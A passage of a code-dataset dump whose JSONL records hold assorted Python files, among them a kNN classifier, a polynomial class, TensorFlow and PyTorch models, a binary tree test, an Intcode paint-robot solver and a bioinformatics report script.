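(addr, size) = struct.unpack('<HH', record)
assert (addr, size) == (0x0010, 0x3000)
# --- end sketch ---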
name='average_cost')\n            tf.summary.scalar('cost', self.cost)\n\n    @staticmethod\n    def ms_error(labels, logits):\n        return tf.square(tf.subtract(labels, logits))\n\n    def _weight_variable(self, shape, name='weights'):\n        initializer = tf.random_normal_initializer(mean=0., stddev=1., )\n        return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n    def _bias_variable(self, shape, name='biases'):\n        initializer = tf.constant_initializer(0.1)\n        return tf.get_variable(name=name, shape=shape, initializer=initializer)\n","sub_path":"rnn_model.py","file_name":"rnn_model.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"118575203","text":"# python: use a dictionary in place of a switch statement\n\nswitcherDict = {\n    0 : 'Sunday', \n    1 : 'Monday',\n    2 : 'Tuesday'\n}\n\nday_name = switcherDict[0]\nprint(day_name)\nday_name1 = switcherDict.get(5, 'Unknown')\nprint(day_name1)\n\n# list comprehension\na = [1,2,3,4,5,6,7,8,9]\nb = [i**2 for i in a]\nprint(b)\n\n\nstudent = {\n    '老熊': 18,\n    '熊二': 19,\n    '熊三': 20\n}\n\n# collect the keys of the dict\nbb = [key for key,value in student.items()]\nprint(bb)","sub_path":"python2/C11.py","file_name":"C11.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"437434434","text":"# \n# k-Nearest Neighbors algorithm\n# kNN\n# \n# Created by wuwenhan on 5/2/16.\n# 16:55\n# Copyright (c) 2016 吴问涵. All rights reserved.\n#\n\nfrom numpy import *\nimport operator\n\ndef classify0(inX, dataSet, labels, k):\n\t\"\"\" Classifier: assign the input to a class using the k-nearest-neighbors algorithm\n\t:param inX: input vector to classify\n\t:param dataSet: training sample set\n\t:param labels: label vector\n\t:param k: number of nearest neighbors to consider\n\t:return: the most frequent label among those neighbors\n\t\"\"\"\n\n\t# number of rows in the training set\n\tdataSetSize = dataSet.shape[0]\n\n\t# distance computation\n\t# tile the input vector dataSetSize times\n\t# [[ 0 0 0 ]    [[ a1 b1 c1 ]   |\n\t#     ...    -      ....        | dataSetSize\n\t# [ 0 0 0 ]]    [ an bn cn ]]   |\n\tdiffMat = tile(inX, (dataSetSize, 1)) - dataSet\n\n\t# [[ a1^2 b1^2 c1^2 ]\n\t#   ....\n\t# [ an^2 bn^2 cn^2 ]]\n\tsqDiffMat = diffMat ** 2\n\n\t# [[ a1^2 + b1^2 + c1^2 ]\n\t#   ....\n\t#   an^2 + bn^2 + cn^2 ]]\n\tsqDistances = sqDiffMat.sum(axis = 1)\n\n\t# [[ √(a1^2 + b1^2 + c1^2) ]\n\t#   ....\n\t#   √(an^2 + bn^2 + cn^2) ]]\n\tdistances = sqDistances ** 0.5\n\n\t# sort ascending; each entry of sortedDistIndicies is the pre-sort index into distances\n\tsortedDistIndicies = distances.argsort()\n\tclassCount = {}\n\n\t# take the k closest points\n\tfor i in range(k):\n\t\t# class label of the i-th closest point\n\t\tvoteIlabel = labels[sortedDistIndicies[i]]\n\t\t# if voteIlabel is already a key of classCount, increment its value; otherwise start at 0\n\t\tclassCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n\t# sort all (key, value) pairs of classCount by value, from largest to smallest\n\tsortedClassCount = sorted(classCount.items(), key = operator.itemgetter(1), reverse = True)\n\n\t# return the most frequent label, i.e. the first element of the first tuple in sortedClassCount\n\treturn sortedClassCount[0][0]\n\ndef autoNorm(dataSet):\n\t\"\"\"\n\t:param dataSet: training sample matrix to normalize\n\t:return: normalized matrix, value ranges, minimum values\n\t\"\"\"\n\n\t# minimums, maximums and value ranges\n\t# [ min(a) min(b) min(c) ]\n\tminVals = dataSet.min(0)\n\t# [ max(a) max(b) max(c) ]\n\tmaxVals = dataSet.max(0)\n\t# [ range(a) range(b) range(c) ]\n\tranges = maxVals - minVals\n\n\t# allocate the normalized matrix\n\tnormDataSet = zeros(shape(dataSet))\n\tprint(normDataSet)\n\n\t# number of rows in the training set\n\tm = dataSet.shape[0]\n\n\t# tile the minimums into a matrix and subtract it from the data set\n\t# [ [ a1-min(a) b1-min(b) c1-min(c) ]\n\t#   ...\n\t# [ an-min(a) bn-min(b) cn-min(c) ] ]\n\tnormDataSet = dataSet - tile(minVals, (m,1))\n\n\t# divide by the range matrix element-wise (not matrix division) to normalize\n\t# [[ a1/range(a) b1/range(b) c1/range(c) ]\n\t#   ...\n\t# [ an/range(a) bn/range(b) cn/range(c) ]]\n\tnormDataSet = normDataSet/tile(ranges, (m,1))\n\n\t# return the normalized training set, the value ranges and the minimums\n\treturn normDataSet, ranges, minVals\n\nlabels = {\n\t'largeDoses': 3,\n\t'smallDoses': 2,\n\t'didntLike': 1\n}\n\ndef file2matrix(filename):\n    fr = open(filename)\n\n    # number of lines in the file\n    arrayOfLines = fr.readlines()\n    numberOfLines = len(arrayOfLines)\n\n    # create the NumPy matrix to return\n    returnMat = zeros((numberOfLines, 3))\n    classLabelVector = []\n\n    index = 0\n\n    # parse the file data into the lists\n    for line in arrayOfLines:\n        line = line.strip()\n        listFromLine = line.split('\\t')\n        returnMat[index,:] = listFromLine[0:3]\n\n        if filename == 'datingTestSet.txt':\n            classLabelVector.append(labels[listFromLine[-1]])\n        else:\n            classLabelVector.append(int(listFromLine[-1]))\n\n        index += 1\n\n    return returnMat, classLabelVector\n\ndef img2vector(filename):\n    returnVect = zeros((1, 1024))\n    fr = open(filename)\n\n    for i in range(32):\n        lineStr = fr.readline()\n        for j in range(32):\n            returnVect[0, 32*i+j] = int(lineStr[j])\n\n    return returnVect","sub_path":"k-临近算法/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"587926329","text":"class Poly:\r\n    \r\n    def __init__(self,*terms):\r\n        # __str__ uses the name self.terms for the dictionary of terms\r\n        # So __init__ should build this dictionary from terms\r\n        self.terms = {}\r\n        for tups in terms:\r\n            if type(tups[0]) not in (int, float):\r\n                raise AssertionError('The coefficient is not an int or a float value')\r\n            elif tups[0] == 0:\r\n                pass\r\n            elif type(tups[1]) is not int or tups[1] < 0:\r\n                raise AssertionError('The power is not a positive integer')\r\n            elif tups[1] in self.terms.keys():\r\n                raise AssertionError('That power is already in the dictionary')\r\n            else:\r\n                
self.terms[tups[1]] = tups[0]\r\n \r\n # Fill in the rest of this method, using *terms to intialize self.terms\r\n\r\n \r\n # I have written str(...) because it is used in the bsc.txt file and\r\n # it is a bit subtle to get correct. Notice that it assumes that\r\n # every Poly object stores a dict whose keys are powers and whose\r\n # associated values are coefficients. This function does not depend\r\n # on any other method in this class being written correctly. \r\n def __str__(self):\r\n def term(c,p,var):\r\n return (str(c) if p == 0 or c != 1 else '') +\\\r\n ('' if p == 0 else var+('^'+str(p) if p != 1 else ''))\r\n if len(self.terms) == 0:\r\n return '0'\r\n else:\r\n return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')\r\n \r\n def __repr__(self):\r\n return 'Poly('+','.join('('+str(self.terms[i])+','+str(i)+')' for i in self.terms.keys())+')'\r\n\r\n \r\n def __len__(self):\r\n power_list = []\r\n for power in self.terms.keys():\r\n power_list.append(power)\r\n if power_list == []:\r\n return 0\r\n else:\r\n return max(power_list)\r\n \r\n def __call__(self,arg):\r\n if type(arg) not in (int, float):\r\n raise AssertionError('Input value is not an int or a float')\r\n else:\r\n answer = 0\r\n for power in self.terms.keys():\r\n answer += self.terms[power]*(arg**power)\r\n return answer\r\n \r\n\r\n def __iter__(self):\r\n for power in sorted(self.terms.keys(), reverse = True):\r\n yield (self.terms[power], power)\r\n \r\n\r\n def __getitem__(self,index):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif index not in self.terms.keys():\r\n return 0\r\n else:\r\n return self.terms[index]\r\n \r\n\r\n def __setitem__(self,index,value):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif value == 0:\r\n if value in self.terms.values():\r\n del self.terms[index]\r\n else:\r\n pass\r\n else:\r\n self.terms[index] = value\r\n \r\n\r\n def __delitem__(self,index):\r\n if type(index) is not int or index < 0:\r\n raise TypeError('The index is not a positive integer')\r\n elif index not in self.terms.keys():\r\n pass\r\n else:\r\n del self.terms[index]\r\n \r\n\r\n def _add_term(self,c,p):\r\n if type(c) not in (int, float):\r\n raise TypeError('The coefficient is not an int or float')\r\n elif type(p) is not int or p < 0:\r\n raise TypeError('The power is not a positive integer')\r\n elif p not in self.terms.keys() and c != 0:\r\n self.terms[p] = c\r\n elif p in self.terms.keys():\r\n new_val = self.terms[p] + c\r\n if new_val == 0:\r\n del self.terms[p]\r\n else:\r\n self.terms[p] = new_val\r\n \r\n\r\n def __add__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The argument is not a valid type')\r\n elif type(right) is int or type(right) is float:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power == 0:\r\n new_poly.append((self.terms[power] + right, power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power in right.terms.keys():\r\n new_poly.append((self.terms[power] + right.terms[power], power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n\r\n \r\n def __radd__(self,left):\r\n if type(left) not in (int, float):\r\n raise TypeError('The 
argument is not a valid type')\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n if power == 0:\r\n new_poly.append((self.terms[power] + left, power))\r\n else:\r\n new_poly.append((self.terms[power], power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __mul__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The second argument is not an int, float, or Poly type')\r\n elif type(right) is int or type(right) is float:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n new_poly.append((self.terms[power]*right, power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __rmul__(self,left):\r\n if type(left) not in (int, float):\r\n raise TypeError('Left argument is not an int or float')\r\n else:\r\n new_poly = []\r\n for power in self.terms.keys():\r\n new_poly.append((self.terms[power]*left, power))\r\n new_terms = (i for i in new_poly)\r\n return Poly(*new_terms)\r\n \r\n\r\n def __eq__(self,right):\r\n if type(right) not in (Poly, int, float):\r\n raise TypeError('The second argument is not a Poly, int, or float')\r\n elif type(right) is int or type(right) is float:\r\n if len(self.terms.keys()) == 1 and 0 in self.terms.keys():\r\n if self.terms[0] == right:\r\n return True\r\n else: return False\r\n else: return False\r\n else:\r\n if self.terms.keys() == right.terms.keys():\r\n for power in self.terms.keys():\r\n if self.terms[power] == right.terms[power]:\r\n return True\r\n else: return False\r\n else: return False\r\n\r\n \r\nif __name__ == '__main__':\r\n # Some simple tests; you can comment them out and/or add your own before\r\n # the driver is called.\r\n print('Start simple tests')\r\n p = Poly((3,2),(-2,1), (4,0))\r\n print(' For Polynomial: 3x^2 - 2x + 4')\r\n print(' str(p):',p)\r\n print(' repr(p):',repr(p))\r\n print(' len(p):',len(p))\r\n print(' p(2):',p(2))\r\n print(' list collecting iterator results:',[t for t in p])\r\n print(' p+p:',p+p)\r\n print(' p+2:',p+2)\r\n print(' p*p:',p*p)\r\n print(' p*2:',p*2)\r\n print('End simple tests\\n')\r\n \r\n import driver\r\n #driver.default_show_exception=True\r\n #driver.default_show_exception_message=True\r\n #driver.default_show_traceback=True\r\n driver.driver()","sub_path":"ics 33/solutions/ile2 solutions/Lab 6/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":7756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457690591","text":"import scipy.io\r\nimport numpy as np\r\nfrom random import shuffle\r\nimport random\r\nimport scipy.ndimage\r\nfrom skimage.util import pad\r\nimport os\r\nimport time\r\nimport pandas as pd\r\nfrom utils import convertToOneHot\r\nimport math\r\nimport tensorflow as tf\r\nimport argparse\r\n\r\n# f=open(\"test12_india_pines.txt\",\"w\")\r\nf=open(\"simple41_india_pines.txt\",\"w\")\r\n# f=open(\"test31_india_pines.txt\",\"w\")\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--data', type=str, default='Indian_pines')\r\nparser.add_argument('--patch_size', type=int, default=11)\r\nparser.add_argument('--batch_size', type=int, default=128)\r\nparser.add_argument('--train_size', type=float, default=0.8)\r\nparser.add_argument('--isnorm', type=int, default=1)\r\nparser.add_argument('--training_iters', type=int, default=10000)\r\nopt = parser.parse_args()\r\n# f=open(\"out.txt\",\"w\")\r\nDATA_PATH = os.path.join(os.getcwd(),\"Data\")\r\nData = scipy.io.loadmat('./Data/' + opt.data + 
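# --- Illustrative usage sketch (editor addition, not a dataset record) ---
# For the Poly class above: Poly((3,2), (-2,1), (4,0)) models 3x^2 - 2x + 4,
# and p(2) sums c * 2**power over the stored terms, giving 12. Horner's rule
# computes the same value from dense high-to-low coefficients, for comparison:
def horner(coeffs_high_to_low, x):
    acc = 0
    for c in coeffs_high_to_low:
        acc = acc * x + c
    return acc

assert horner([3, -2, 4], 2) == 12   # matches p(2) from the simple tests above
# --- end sketch ---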
'.mat')[opt.data.lower()]\r\nLabel = scipy.io.loadmat('./Data/' + opt.data + '_gt.mat')[opt.data.lower() + '_gt']\r\nHeight, Width, Band = Data.shape[0], Data.shape[1], Data.shape[2]\r\nNum_Classes = len(np.unique(Label))\r\npatch_size=opt.patch_size\r\nbatch_size=opt.batch_size\r\ntraining_iters = opt.training_iters\r\nData = Data.astype(float)\r\nif opt.isnorm == 1:\r\n for band in range(Band):\r\n Data[:, :, band] = (Data[:, :, band] - np.min(Data[:, :, band])) / (\r\n np.max(Data[:, :, band]) - np.min(Data[:, :, band]))\r\nData_Padding = np.zeros((Height+int(patch_size-1),Width+int(patch_size-1),Band))\r\nfor band in range(Band):\r\n Data_Padding[:,:,band] = pad(Data[:,:,band],int((patch_size-1)/2),'symmetric')\r\ndef Patch(height_index,width_index):\r\n \"\"\" function to extract patches from the orignal data \"\"\"\r\n # transpose_array = np.transpose(Data_Padding,(2,0,1))\r\n height_slice = slice(height_index, height_index + patch_size)\r\n width_slice = slice(width_index, width_index + patch_size)\r\n patch = Data_Padding[height_slice, width_slice,:]\r\n return np.array(patch)\r\nAll_Patches, All_Labels ,Al_Labels = [],[],[]\r\ncount=0\r\nk=0\r\nres=0\r\n# for i in range(int(Height*Width/batch_size)):\r\n# All_Patches.append([])\r\n# All_Labels.append([])\r\n# Al_Labels.append([])\r\nfor j in range(0,Width):\r\n for i in range(0,Height):\r\n curr_patch=Patch(i,j)\r\n All_Patches.append(curr_patch)\r\n # Label[i,j]=np.array(Label[i,j])\r\n # Labels = convertToOneHot(Label[i,j], num_classes=Num_Classes)\r\n All_Labels.append(Label[i, j])\r\n count = count + 1\r\n # if count % batch_size == 0:\r\n # k = k + 1\r\n # if Label[i,j]!=0:\r\n# for j in range(0,Width):\r\n# for i in range(0,Height):\r\n# curr_patch=Patch(i,j)\r\n# if Label[i,j]!=0:\r\n# All_Patches.append(curr_patch)\r\n# # Label[i,j]=np.array(Label[i,j])\r\n# # Labels = convertToOneHot(Label[i,j], num_classes=Num_Classes)\r\n# All_Labels.append(Label[i, j]-1)\r\n# count = count + 1\r\nAll_Labels=np.array(All_Labels)\r\nAll_Patches=np.array(All_Patches)\r\nprint(\"the count is %d\"%count)\r\nprint(\"k is %d\"%k)\r\nprint(All_Patches.shape)\r\nHeight1, Width1, Band1 = All_Patches.shape[1], All_Patches.shape[2], All_Patches.shape[3]\r\nprint(curr_patch.shape)\r\n# for i in range(int(Height*Width/batch_size)):\r\n# All_Labels[i] = np.array(All_Labels[i])\r\nAll_Labels = convertToOneHot(All_Labels, num_classes=Num_Classes)\r\nAll_Labels=np.array(All_Labels)\r\n#4105*5*17\r\nprint(\"the shape of All_patchs\")\r\nprint(All_Patches.shape)\r\nprint(\"the shape of All_Labels\")\r\nprint(All_Labels.shape)\r\nTrain_Patch,Train_Label,Test_Patch, Test_Label = [],[],[],[]\r\nTrain_portition=opt.train_size\r\nNum=count\r\nNum_Train_Classes=int(Train_portition*Num)\r\nprint(\"Num is %d\"%Num)\r\nprint(\"Num_Train is %d\"%Num_Train_Classes)\r\nTest_portition=1-Train_portition\r\nnp.random.seed(0)\r\nidx = np.random.choice(Num, Num_Train_Classes, replace=False)\r\nidx_test = np.setdiff1d(range(Num),idx)#求集合的差\r\nTrain_Patch = [All_Patches[i] for i in idx]\r\nTrain_Label = [All_Labels[i] for i in idx]\r\nTest_Patch = [All_Patches[i] for i in idx_test]\r\nTest_Label = [All_Labels[i] for i in idx_test]\r\nTrain_Label=np.array(Train_Label)\r\nTrain_Patch=np.array(Train_Patch)\r\nTest_Label=np.array(Test_Label)\r\nTest_Patch=np.array(Test_Patch)\r\nprint(\"the shape of test_label\")\r\nprint(Test_Label.shape)\r\nprint(\"the shape of 
test_patch\")\r\nprint(Test_Patch.shape)\r\nTest_Label=np.reshape(Test_Label,(-1,Num_Classes))\r\nTest_Patch=np.reshape(Test_Patch,(-1,Height1,Width1,Band1))\r\nx=tf.placeholder(tf.float32, [None,Height1,Width1,Band1])\r\ny=tf.placeholder(tf.float32, [None,Num_Classes])\r\n# print(\"%d %d %d\"%(Height,Width,Band))\r\ndef weight_variable(shape):\r\n initial=tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\ndef bias_variable(shape):\r\n initial =tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\ndef con2d(x,W):\r\n return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding=\"SAME\")\r\n # return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"VALID\")\r\ndef max_pool(x):\r\n return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\r\nsize=3\r\nW_conv1=weight_variable([3,3,Band1,32])\r\ntf.add_to_collection(tf.GraphKeys.WEIGHTS,W_conv1)\r\nb_conv1=bias_variable([32])\r\nh_conv1=tf.nn.relu(con2d(x,W_conv1)+b_conv1)\r\n# h_conv1=tf.nn.relu(tf.layers.BatchNormalization(trainable=True)(con2d(x,W_conv1)+b_conv1))\r\nh_conv1=max_pool(h_conv1)\r\nW_conv2=weight_variable([3,3,32,64])\r\ntf.add_to_collection(tf.GraphKeys.WEIGHTS,W_conv2)\r\nb_conv2=bias_variable([64])\r\nh_conv2=tf.nn.relu(con2d(h_conv1,W_conv2)+b_conv2)\r\n# h_conv2=tf.nn.relu(tf.layers.BatchNormalization(trainable=True)(con2d(h_conv1,W_conv2)+b_conv2))\r\nh_conv2=max_pool(h_conv2)\r\nW_fc1=weight_variable([size*size*64,128])\r\nb_fc1=bias_variable([128])\r\nh_flat=tf.reshape(h_conv2,[-1,size*size*64])\r\nh_fc1=tf.nn.relu(tf.matmul(h_flat,W_fc1)+b_fc1)\r\nW_fc2=weight_variable([128,Num_Classes])\r\n\r\nb_fc2=bias_variable([Num_Classes])\r\nh_fc2=tf.nn.relu(tf.matmul(h_fc1,W_fc2)+b_fc2)\r\nscale=0.1\r\nregularizer=tf.contrib.layers.l2_regularizer(scale)\r\nreg_term=tf.contrib.layers.apply_regularization(regularizer)\r\ncross_entropy=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=h_fc2))+reg_term\r\n# cross_entropy=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=h_fc2))\r\noptimizer=tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\r\ncorrect_prediction=tf.equal(tf.argmax(y,1),tf.argmax(h_fc2,1))\r\naccuracy=tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n# Initializing the variables\r\ninit = tf.global_variables_initializer()\r\n# sess=tf.InteractiveSession()\r\n# sess.run(tf.global_variables_initializer())\r\ncount=0\r\nprint(\"the shape of train_label\")\r\nprint(Train_Label.shape)\r\nprint(\"the shape of train_patch\")\r\nprint(Train_Patch.shape)\r\nTest_Label=np.reshape(Test_Label,(-1,Num_Classes))\r\nTest_Patch=np.reshape(Test_Patch,(-1,Height1,Width1,Band1))\r\nTrain_Label=np.reshape(Train_Label,(-1,Num_Classes))\r\nTrain_Patch=np.reshape(Train_Patch,(-1,Height1,Width1,Band1))\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n # Training cycle\r\n for iteration in range(training_iters):\r\n idx = np.random.choice(Num_Train_Classes, size=batch_size, replace=False)\r\n # Use the random index to select random images and labels.\r\n # indian_pines\r\n batch_x = Train_Patch\r\n batch_y = Train_Label\r\n # pavia\r\n # batch_x = Train_Patch[idx, :]\r\n # batch_y = Train_Label[idx, :]\r\n # Run optimization op (backprop) and cost op (to get loss value)\r\n _, batch_cost, train_acc = sess.run([optimizer, cross_entropy, accuracy],feed_dict={x: batch_x,y: batch_y})\r\n # Display logs per epoch step\r\n if iteration % 100 == 0:\r\n print(\"Iteraion\", '%04d,' % (iteration), \\\r\n \"Batch cost=%.4f,\" % (batch_cost),\\\r\n 
\"Training Accuracy=%.4f\" % (train_acc),file=f)\r\n if iteration % 500 ==0:\r\n print('Training Data Eval: Training Accuracy = %.4f' % sess.run(accuracy,\\\r\n feed_dict={x: Train_Patch,y: Train_Label}),file=f)\r\n print('Test Data Eval: Test Accuracy = %.4f' % sess.run(accuracy,\\\r\n feed_dict={x: Test_Patch,y: Test_Label}),file=f)\r\n print(\"Optimization Finished!\",file=f)\r\n\r\n# for i in range(len(Train_Patch)):\r\n# train_accuracy = accuracy.eval(feed_dict={x: Train_Patch[i], y: Train_Label[i]})\r\n# count += train_accuracy * batch_size\r\n# print(\"step %d,training accuracy %g\" % (i,train_accuracy))\r\n# train_step.run(feed_dict={x: Train_Patch[i], y: Train_Label[i]})\r\n# print(count)\r\n# # # All_Patches[i] = np.reshape(All_Patches[i], (1, Height, Width, Band))\r\n# # # print(All_Patches[i].shape)\r\n# # if i %100 ==0:\r\n# print(\"test accuracy: %g\"%accuracy.eval(feed_dict={x:Test_Patch,y:Test_Label}))\r\n\r\n\r\n# print(Data.astype)\r\n# Data = Data.astype(float)\r\n# print(\"%d\"%(Num_Classes))\r\n# print(Data.shape)\r\n# print(Data[20,1,1])\r\nf.close()","sub_path":"simple-Net/simplenet41.py","file_name":"simplenet41.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526498974","text":"import torch\nimport torch.nn as nn\n\nclass Discriminator(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, f, f_relu):\n super(Discriminator, self).__init__()\n self.map1 = nn.Linear(input_size, hidden_size)\n #self.batch1 = nn.BatchNorm1d(hidden_size)\n self.map2 = nn.Linear(hidden_size, hidden_size)\n #self.batch2 = nn.BatchNorm1d(hidden_size)\n self.map3 = nn.Linear(hidden_size, output_size)\n #self.batch3 = nn.BatchNorm1d(hidden_size)\n #self.map4 = nn.Linear(hidden_size, output_size)\n # self.map4 = nn.Linear(hidden_size, hidden_size)\n # self.map5 = nn.Linear(hidden_size, output_size)\n self.f = f\n self.f_relu = f_relu\n\n def forward(self, x):\n x = self.map1(x)\n #x = self.batch1(x)\n x = self.f(x)\n x = self.map2(x)\n #x = self.batch2(x)\n x = self.f(x)\n x = self.map3(x)\n #x = self.batch3(x)\n x = self.f(x)\n #x = self.map4(x)\n #x = self.f(x)\n # x = self.map5(x)\n # x = self.f(x)\n return x\n","sub_path":"Architecture/Interpolation_GAN/Discriminator.py","file_name":"Discriminator.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572942233","text":"__author__ = 'Stephen'\n\nfrom BinaryTree import Tree\nimport unittest\n\n\nclass TreeTest(unittest.TestCase):\n def test_tree(self):\n \"\"\"Test that the tree structure is as expected: all nodes have correct parent and children.\n \"\"\"\n tree = Tree()\n root = tree.add_root(1)\n left = root.add_left(2)\n right = root.add_right(3)\n\n self.assertEqual(None, root.parent)\n self.assertEqual(root, tree.root)\n self.assertEqual(left, tree.root.left)\n self.assertEqual(right, tree.root.right)\n self.assertEqual(root, left.parent)\n self.assertEqual(root, right.parent)\n self.assertEqual(None, left.left)\n self.assertEqual(None, left.right)\n self.assertEqual(None, right.left)\n self.assertEqual(None, right.right)\n\n def breadth_first_test(self):\n \"\"\"Test that the breadth first traversal returns nodes in the correct order: left to right, top to bottom;\n processing all nodes on a level from left to right before proceeding down a level.\n E.g. 
1\n            2 3\n           4 5 6 7\n        \"\"\"\n        tree = Tree()\n        root = tree.add_root(1)\n        left = root.add_left(2)\n        right = root.add_right(3)\n        left.add_left(4)\n        left.add_right(5)\n        right.add_left(6)\n        right.add_right(7)\n\n        items = []\n        for item in tree.breadth_first():\n            items.append(item.data)\n\n        self.assertEqual(items, [1, 2, 3, 4, 5, 6, 7])\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"Assignment2/Breadth-FirstTreeTraversal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"209991630","text":"from program import Program\n\n\nDEBUG = False\n\n\nclass Direction:\n\n    def __init__(self):\n        self.index = 0\n        self.directions = [\n            (0, 1),\n            (1, 0),\n            (0, -1),\n            (-1, 0)\n        ]\n\n    def rotate(self, value):\n        self.index += (value if value == 1 else -1)\n\n    def step(self, position):\n        to_go = self.directions[self.index % len(self.directions)]\n        return position[0] + to_go[0], position[1] + to_go[1]\n\n\nclass PaintBot:\n\n    def __init__(self, memory, starting_color):\n        # use the memory passed in by the caller rather than re-reading it via get_memory()\n        self.program = Program(memory, self, DEBUG)\n        self.color = True\n        \n        self.direction = Direction()\n        self.grid = {}\n        self.position = (0, 0)\n        self.grid[self.position] = starting_color\n\n    def run(self):\n        while self.program.has_next():\n            self.program.next()\n\n    def get_input(self):\n        return self.grid[self.position] if self.position in self.grid else 0\n\n    def add_output(self, value):\n        if self.color:\n            self.grid[self.position] = value\n        else:\n            self.direction.rotate(value)\n            self.position = self.direction.step(self.position)\n        self.color = not self.color\n\n    def get_grid(self):\n        xs = 
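# --- Illustrative sketch (editor addition, not a dataset record) ---
# The breadth_first() traversal exercised by the tree test above is typically
# a deque-based loop. Node attribute names follow the test; the method body
# itself is an assumption, since BinaryTree.py is not part of the record:
from collections import deque

def breadth_first(root):
    queue = deque([root])
    while queue:
        node = queue.popleft()
        yield node                      # visit left to right, top to bottom
        if node.left is not None:
            queue.append(node.left)
        if node.right is not None:
            queue.append(node.right)
# --- end sketch ---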
[position[0] for position in self.grid]\n ys = [position[1] for position in self.grid]\n\n rows = []\n for y in range(min(ys), max(ys)+1):\n row = []\n for x in range(max(xs), min(xs) - 1, -1):\n value = self.grid.get((x, y), 0)\n value = '.' if value == 0 else '#'\n row.append(value)\n rows.append(''.join(row))\n return '\\n'.join(rows)\n\n\ndef main():\n # Part 1: 1909\n print('Part 1: {}'.format(run(0, False)))\n # Part 2: JUFEKHPH\n run(1, True)\n\n\ndef run(setting, print_grid):\n bot = PaintBot(get_memory(), setting)\n bot.run()\n if print_grid:\n print(bot.get_grid())\n return len(bot.grid)\n\n\ndef get_memory():\n file_name = 'data'\n with open('{}.txt'.format(file_name), 'r') as f:\n return [int(datum) for datum in f.read().split(',')]\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2019/11/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294006236","text":"#!/usr/bin/env python2.7\nimport os\nimport sys \nimport re\nimport glob\nimport csv\nfrom pandas import DataFrame\nimport pandas as pd\nimport numpy as np\nimport webbrowser\nimport pandas\n\n\n\ndef main(argv):\n if len(argv) >= 2:\n print (\"\\nUsage: python2.7 final_report.py \")\n sys.exit(2)\n\nkraken = sys.argv[1]\nstatH = sys.argv[2]+ \"bammappingStats.txt\"\nstatE = sys.argv[3]+ \"bammappingStats.txt\"\nstatC = sys.argv[4]+ \"bammappingStats.txt\"\nkrona = sys.argv[5]\noutputfileconcat = sys.argv[6]\n\n\n\nstringToMatch = ['hepatitis', 'Ebola' , 'Chikungunya' ]\ndf = []\nfor key in stringToMatch :\n\t#print (key)\n\tkrakenfile = open (kraken , \"r\")\t\n\ttrouv = key,\"Not Found\"\n\tfor line in krakenfile :\t\n\t\tif key in line: \n\t\t\ttrouv = key,\"Found\"\n\t#print (trouv)\n\n\tdf.append(trouv)\n#print(df)\nff = DataFrame.from_records(df) \n#print (ff)\n#bwa output\nimport glob\n\nbwa = glob.glob(\"*bammappingStats.txt\")\n#print (bwa)\nsearch = ['mapped (']\ndf2 = []\nfor file in bwa :\n with open(file, 'r') as f:\n ligne = f.readlines()\n #print (ligne)\n for line in ligne:\n if \"mapped (\" in line :\n match = (re.sub('\\.bammappingStats.txt$', '', file),line)\n #print (match)\n df2.append(match)\n #print(df2)\ngg = DataFrame.from_records(df2)\nresult = pd.concat([gg, ff], axis=1, ignore_index=True)\nresult = result.drop([2], axis = 1)\nresult.columns = ['Pathogen', '%mapped' , 'kraken']\n#print(result)\n\nresult.to_html(\"Table.html\")\n\n#convert kraken tsv to html 